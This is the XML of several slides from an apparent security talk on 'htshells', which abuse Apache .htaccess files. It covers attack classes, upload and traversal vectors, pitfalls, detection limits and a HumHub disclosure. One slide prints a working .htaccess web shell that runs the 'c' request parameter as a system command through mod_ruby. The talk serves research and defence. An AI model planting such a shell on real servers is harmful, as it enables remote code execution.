          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill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Abusing run time configuration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CB878-093A-E14B-89EC-C04DAF983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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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137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1732700" y="11641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Existing attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/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1732700" y="1819059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 dirty="0"/>
              <a:t>Information disclosure</a:t>
            </a:r>
            <a:endParaRPr sz="10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Enable functionality that has been disabled in order to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" err="1"/>
              <a:t>ob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>ta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>in more information. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" err="1"/>
              <a:t>Ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t>: server-status</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Shape 493"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909500" y="1819059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000" b="1" dirty="0"/>
              <a:t>Shells</a:t>
            </a:r>
            <a:endParaRPr sz="10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Ability to execute attacker controlled code on the server.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200760" y="1805498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000" b="1" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0"/>
              <a:t> bypass</a:t>
            </a:r>
            <a:endParaRPr sz="10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000" dirty="0"/>
              <a:t>Disable authentication</a:t>
            </a:r>
            <a:endParaRPr sz="10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1732700" y="3056499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 dirty="0"/>
              <a:t>“Traversal”</a:t>
            </a:r>
            <a:endParaRPr sz="10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Disclose files, not just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t> traversal. Enabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" err="1"/>
              <a:t>direc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" err="1"/>
              <a:t>ry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0"/>
              <a:t> indexes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Shape 496"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909500" y="3056499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 dirty="0"/>
              <a:t>Denial of service</a:t>
            </a:r>
            <a:endParaRPr sz="10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Make the server stop rendering pages</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Shape 497"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200760" y="3056499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 dirty="0"/>
              <a:t>Other</a:t>
            </a:r>
            <a:endParaRPr sz="10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000" dirty="0"/>
              <a:t>Everything else,…</a:t>
            </a:r>
            <a:endParaRPr sz="10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92914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5E8A93-D057-2E45-AD17-7F08D3019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2321"/>
            <a:ext cx="9144000" cy="391885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925D49-53D5-A54E-854E-AF452B06FD4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418454" y="4246536"/>
            <a:ext cx="51454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950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Polyglots</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369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2400" dirty="0" err="1"/>
              <a:t>htshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> files are usually valid .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> files, valid html pages and valid ${language} files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="370" name="Shape 370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71" name="Shape 37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Shape 373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74" name="Shape 37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Shape 378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057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1673817" y="0"/>
            <a:ext cx="7470183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AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;Files ~ "^\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow,deny</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Allow from all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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/Files&gt;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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IfModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mod_ruby.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="16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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RubyRequire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> apache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>erb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-run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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RubySafeLevel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0 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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AddType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> text/html .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;Files *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="16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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SetHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ruby-object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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RubyHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Apache::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ERbRun.instance</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;/Files&gt;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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IfModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="16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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># &lt;% require '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CGI.new;cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>["c"];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.untaint;puts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> `#{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}` %&gt;</a:t>
            </a:r>
            <a:endParaRPr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00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Don’t forget!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There are many options available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Modifying the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file can increase the chance of success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999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Placing files on servers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4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EE7C8-E4F8-4441-AED0-796EACCD2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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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704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Generic methods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File upload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Directory traversal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URL download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XXE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File write from database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9966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File upload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PUT HTTP verb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Upload via form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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> is often an overlooked “extension”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Can the file be renamed after upload?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Combined with directory traversal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File upload functionality have specific behaviours at the language level (PHP, CGI, etc)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6602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XXE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Leverage the jar:// handler for file upload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Usually specific conditions for each app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C8CF54-D4B5-C14F-9997-B870F8D01263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274126" y="4610748"/>
            <a:ext cx="786144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9BBD5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5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273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0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E043E-A603-464F-9A09-527E98463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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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312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pitfalls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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file cannot be overwritten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Syntax errors in .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Apache syntax differs between versions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Fingerprinting server config is very helpful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endParaRPr lang="en-AU" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Syntax issues and overwriting can be overcome with some clever tricks and testing locally first</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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14C9C4-0FED-FF4D-9EDD-FF26ADB98A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731792" y="4556502"/>
            <a:ext cx="2999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9BBD5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/wireghoul/lbmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5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0933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Detection and defence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5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EE7C8-E4F8-4441-AED0-796EACCD2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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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994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 idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6738857" y="929897"/>
            <a:ext cx="2219165" cy="8449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 b="1" dirty="0"/>
              <a:t>Anti virus?</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0E293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B6FB79-2B39-0148-8589-3EEE264FB0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30" t="9627" r="50255" b="70740"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511444" y="1352387"/>
            <a:ext cx="7916057" cy="247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6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Application Firewalls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Blocks silly web shells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Trivial to bypass with tiny bit of code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Not the right defence against files on local drive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340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shell detectors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AU" dirty="0"/>
              <a:t>Not real time detection, you can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> after use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Only PHP detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Most of these detect the code, but don’t scan dotfiles anyway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File hashes is bad detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1272178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4D975B-126E-E549-B1D4-B9A75C82C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97" y="1742579"/>
            <a:ext cx="8866590" cy="173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30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The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> protection method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This one seems popular according to Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tomolivercv.wordpress.com/2011/07/24/protect-your-uploads-folder-with-htaccess/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="19BBD5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/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7E3FB-85A5-6D4D-BD85-E4AC8FE2B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02" y="3357517"/>
            <a:ext cx="8624777" cy="13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03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C946BE-F32B-B84A-B2C8-16A66291F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That one repository on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with the Yara rule for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="76200" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Wireghoul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6420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ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3743135" y="1111846"/>
            <a:ext cx="5704739" cy="2050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err="1"/>
              <a:t>AllowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5400" dirty="0"/>
              <a:t> None</a:t>
            </a:r>
            <a:endParaRPr sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="370" name="Shape 370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71" name="Shape 37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Shape 373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74" name="Shape 37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Shape 378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87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Myth busting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6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EE7C8-E4F8-4441-AED0-796EACCD2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434" y="4537917"/>
            <a:ext cx="2445488" cy="35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81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story…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It started with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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Multiple file uploads, but no shell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A few months later while reading a book…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 err="1"/>
              <a:t>Htshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>!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6066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Uploads outside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> are safe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Not if files in subdirectories are web accessible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Thumbnails generated in sub directory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Thumbnail directory has a web alias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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> lookup paths includes parent directories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26482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Htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>defence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AU" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t> files cannot defend against .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t> based attacks!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141795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Story: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>HumHub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AU" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://seclists.org/fulldisclosure/2015/Feb/60</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Unrestricted upload of .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>User may enable a distributed .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> file for protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Researcher attempted to bypass, but failed…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4259380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AC27-FA1E-6041-8F64-C3C68A32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Humhub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27A31-273D-9443-B0D5-2F66AD1D1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err="1"/>
              <a:t>HumHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> comes with a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htaccess.dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [3] file in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HumHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> root directory which, if enabled by the user, prevents direct access to dotfiles (such as .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>svn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, .git, etc.) using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is unaffected by the override (and using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RewriteEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Off directive does not affect the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file itself) this prevents the above scenario from being exploitable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303500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06DC0-4EE5-1E45-8DAD-B948100B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2436" y="180109"/>
            <a:ext cx="7550728" cy="4835236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# prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from serving dotfiles (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
